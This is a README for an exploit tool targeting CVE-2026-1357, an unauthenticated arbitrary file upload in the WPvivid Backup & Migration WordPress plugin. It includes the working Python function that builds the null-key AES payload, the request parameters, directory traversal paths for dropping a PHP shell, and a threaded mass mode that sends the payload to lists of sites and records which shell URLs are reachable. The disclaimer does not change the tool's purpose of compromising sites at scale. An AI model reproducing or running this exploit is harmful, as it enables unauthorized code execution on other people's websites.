Share
## https://sploitus.com/exploit?id=56A8832B-D1BC-58CA-B8BF-2A87BA6E0468
# ๐Ÿงจ CVE-2026-1357 โ€“ WPvivid Null-Key Exploit Tool (`CVE-2026-1357.py`)

**Migration, Backup, Staging โ€“ WPvivid Backup & Migration โ‰ค 0.9.123**  
**Vulnerability:** Unauthenticated Arbitrary File Upload โ†’ Remote Code Execution  
**CVE:** `CVE-2026-1357` โ€“ **CVSS 9.8 (Critical)**

**Author:** **Nxploited (Khaled Alenazi)**  
**GitHub:** `https://github.com/Nxploited`  
**Telegram:** [`@KNxploited`](https://t.me/KNxploited)

---

## ๐Ÿงฌ What This Script Does

`CVE-2026-1357.py` is a **proof-of-concept exploitation tool** for the WPvivid vulnerability. It focuses on the flawed AES session handling that allows an attacker to:

1. Encrypt a payload with a **null AES key/IV** (all zero bytes) in the same format WPvivid expects.
2. Embed arbitrary file content (e.g., PHP shell) and a chosen filename/path (`name`) into the payload.
3. Send this payload to the WPvivid endpoint via the `wpvivid_action=send_to_site` parameter.
4. (Optionally) verify whether the file was successfully written and is accessible.

The script does **not** attempt to guess or abuse private keys directly. Instead, it simulates WPvividโ€™s broken flow where a failed `openssl_private_decrypt()` leads to phpseclibโ€™s AES cipher being initialized with a null-key.

---

## ๐Ÿง  Technical Internals

### ๐Ÿ” AES Null-Key Payload

The core of the exploit is in `gen_wpvivid_payload()`:

- It builds a JSON structure:

  ```json
  {
    "name": "",
    "offset": 0,
    "data": "",
    "file_size": ,
    "md5": ""
  }
  ```

- It serializes this JSON (compact form, no spaces).
- It encrypts the JSON using:
  - `AES-128-CBC`
  - `key = b"\x00" * 16`
  - `iv  = b"\x00" * 16`
- It then prepends:
  - 3 bytes: `"000"` (a static length field placeholder).
  - 16-byte uppercase hex: cipher length encoded as `"{len(cipher):016X}"`.
- The final encrypted blob is:

  ```text
  "000" +  + 
  ```

- This blob is base64-encoded and returned as the final `wpvivid_content` value.

Function:

```python
def gen_wpvivid_payload(file_name: str, file_bytes: bytes) -> str:
    file_md5 = hashlib.md5(file_bytes).hexdigest()
    json_obj = {
        "name": file_name,
        "offset": 0,
        "data": base64.b64encode(file_bytes).decode(),
        "file_size": len(file_bytes),
        "md5": file_md5,
    }
    json_str = json.dumps(json_obj, separators=(",", ":")).encode()
    cipher = AES.new(NULL_KEY, AES.MODE_CBC, NULL_IV)
    encrypted = cipher.encrypt(pad(json_str, AES.block_size))
    key_len_field = b"000"
    cipherlen_field = f"{len(encrypted):016X}".encode()
    blob = key_len_field + cipherlen_field + encrypted
    return base64.b64encode(blob).decode()
```

This matches the WPvivid decryption expectations in the vulnerable code path after RSA decryption failure.

---

## ๐Ÿงฐ Features & Modes

The script has **two main modes** plus a mass-testing capability:

1. `mood1` โ€“ **Payload Generator**
   - Generates a valid `wpvivid_content` value using the null-key trick.
   - Supports multiple ways of defining the file content.
   - Optionally launches **Mass Tester** against a list of targets.

2. `mood2` โ€“ **Single Target Tester**
   - Uses a previously generated payload.
   - Tests a **single** target end-to-end:
     - Sends the payload.
     - Constructs the expected resulting file URL.
     - Verifies if the file is reachable.

3. **Mass Mode** (from `mood1`)
   - Sends a chosen payload to **multiple targets** from a list file.
   - Uses concurrency and a progress bar.
   - Tracks and logs successful uploads.

---

## ๐Ÿšฆ Running the Script

```bash
python3 CVE-2026-1357.py
```

You will see a **Rich-based UI** with a banner and mode selection:

- `mood1` โ€“ Payload Generator
- `mood2` โ€“ Single Target Tester

---

## ๐Ÿงช Mode: mood1 โ€“ Payload Generator

### Purpose

- Create an exploit payload (`wpvivid_content`) that encodes:
  - The **file path/name** you want WPvivid to write.
  - The **file content** (shell, test file, etc.).

### Flow

1. **Mode selection**

   When prompted:

   ```text
   Choose mode (mood1/mood2) [mood1]:
   ```

   Press `Enter` (defaults to `mood1`) or type `mood1`.

2. **Target filename / path**

   You are asked for:

   ```text
   Target file name (e.g., Nx_.php or ../../public/Nx_.php):
   ```

   Examples:

   - To drop a file into the WPvivid backup directory:

     ```text
     Nx_.php
     ```

   - To abuse directory traversal (if allowed by the target):

     ```text
     ../../public_html/Nx_.php
     ```
   
   The value goes into the `name` field of the JSON payload.

3. **Content input mode**

   The script displays three ways to define the file content:

   - **Mode 1**: single-line content.
   - **Mode 2**: multi-line content (ends with `EOF`).
   - **Mode 3**: read from a local file (e.g. `shell.php`).

   You are prompted:

   ```text
   Mode [1/2/3] [1]:
   ```

   - **Mode 1 โ€“ Single line**

     ```text
     Single line content:
     ```

     Input example:

     ```text
     
     EOF
     ```

   - **Mode 3 โ€“ Local file**

     ```text
     Local file path (e.g., shell.php):
     ```

     The script reads the entire file into `file_bytes`.

4. **Payload generation**

   Once the content is captured, the script:

   - Builds the JSON object.
   - Encrypts it with null-key AES-CBC.
   - Wraps the binary blob.
   - Base64-encodes it.

   You see output like:

   ```text
   Payload generated.
   Use the value after '=' as wpvivid_content.

   wpvivid_content=BASE64_BLOB_HERE
   ```

   And a file `wpvivid_payload.txt` is written:

   ```text
   file_name=Nx_.php
   wpvivid_content=BASE64_BLOB_HERE
   ```

### Optional: Mass Mode from mood1

After generating the payload, the script asks:

```text
Auto-send this payload to targets list (mass mode)? (y/N):
```

If you answer `y`, it starts **mass mode** with the payload and filename you just created.

---

## ๐ŸŒ Mass Mode โ€“ Multiple Targets

### Purpose

- Take a **single exploit payload** and test it against a **list of targets**.

### Flow

1. **Targets file**

   Example prompt:

   ```text
   Targets list file (one URL per line):
   ```

   Expected format of file (e.g. `targets.txt`):

   ```text
   https://site1.com
   site2.com
   http://site3.net
   ```

   The script will automatically normalize base URLs (adding scheme where missing).

2. **Thread count**

   ```text
   Threads (concurrent sites) [5]:
   ```

   Controls how many sites are processed in parallel.

3. **Per-target logic**

   For each target:

   - Normalize URL โ†’ `base_url`.
   - Call:

     ```python
     send_wpvivid_payload(base_url, payload)
     ```

     which:

     - Builds `wpvivid_action=send_to_site` + `wpvivid_content=` POST.
     - Sends via a fresh session with tuned connection pool settings.
     - Checks if the response contains `{"result":"success"}` (compact form check).

   - If upload is considered successful:
     - Construct `shell_url` as:

       ```python
       f"{base_url}/wp-content/wpvividbackups/{file_name.lstrip('/')}"
       ```

     - Save it to `Nx_.txt`.
     - Attempt `verify_written_file()`:
       - Requests `shell_url` with GET.
       - If `status_code == 200`, marks as verified.
   - If any errors occur:
     - The script classifies the reason via `short_reason()`:
       - TIMEOUT / SSL / 404 / 403 / CONN / REQUEST / VERIFY / ERROR.

4. **UI**

   - Rich progress bar shows global progress and elapsed time.
   - Each site prints:
     - `[OK] ` on success.
     - `[FAIL]  (reason: ...)` on error.
     - `[!] Not verified (...)` when upload may have succeeded but verification failed.

---

## ๐Ÿงช Mode: mood2 โ€“ Single Target Tester

### Purpose

- Use an existing payload (from `wpvivid_payload.txt` or external source) against a **single URL**, and verify resulting file.

### Flow

1. **Target URL**

   Prompt:

   ```text
   Target base URL (e.g., https://site.com):
   ```

   Example:

   ```text
   https://victim.com
   ```

   The script normalizes this to a base like:

   ```text
   https://victim.com
   ```

2. **File name**

   Prompt:

   ```text
   Expected file name (e.g., Nx_.php):
   ```

   This is the name/path **you expect** WPvivid to write (matching what you encoded in the payloadโ€™s `name` field).

3. **Payload input**

   Prompt:

   ```text
   Paste wpvivid_content payload (base64 or 'wpvivid_content=...'):
   ```

   - If you paste a full line starting with `wpvivid_content=...`, it strips the prefix.
   - If you paste only the base64, it takes it as is.

4. **Execution**

   The script:

   - Sends the POST with `wpvivid_action=send_to_site` + your `wpvivid_content`.
   - If the response suggests success, it constructs:

     ```text
     /wp-content/wpvividbackups/
     ```

     and prints `[OK]` with that URL.
   - Appends successful URLs to `Nx_.txt`.
   - Attempts verification via `verify_written_file()` and prints the result.

This mode is ideal for **manual / lab testing** of a single site with fine control over the payload.

---

## ๐Ÿ“ Output Files

- **`wpvivid_payload.txt`**
  - Written in `mood1`.
  - Stores:
    - `file_name=`
    - `wpvivid_content=`

- **`Nx_.txt`**
  - Written by `mood1` (mass mode) and `mood2`.
  - Contains one **successful file URL per line** where upload appears to have succeeded (and optionally verified).

---

## โš ๏ธ Disclaimer

This tool is intended **solely for**:

- Security research in controlled environments.
- Testing systems **you own** or **have explicit, written permission** to test.
- Validating remediation and detection measures for CVE-2026-1357.

By using this script, you agree that:

- You are responsible for complying with all applicable laws.
- You will **not** use it on systems without proper authorization.
- The author (Nxploited) bears **no responsibility** for any misuse, damage, legal issues, or incidents arising from the use of this tool.

Use it **at your own risk** and **only for legitimate security testing**.

---

## โœ๏ธ Author & Contact

- **By:** `Nxploited` (Khaled Alenazi)  
- **GitHub:** `https://github.com/Nxploited`  
- **Telegram:** [`@KNxploited`](https://t.me/KNxploited)

For updates, tools, and security research content, follow the Telegram channel:  
๐Ÿ‘‰ **[`@KNxploited`](https://t.me/KNxploited)**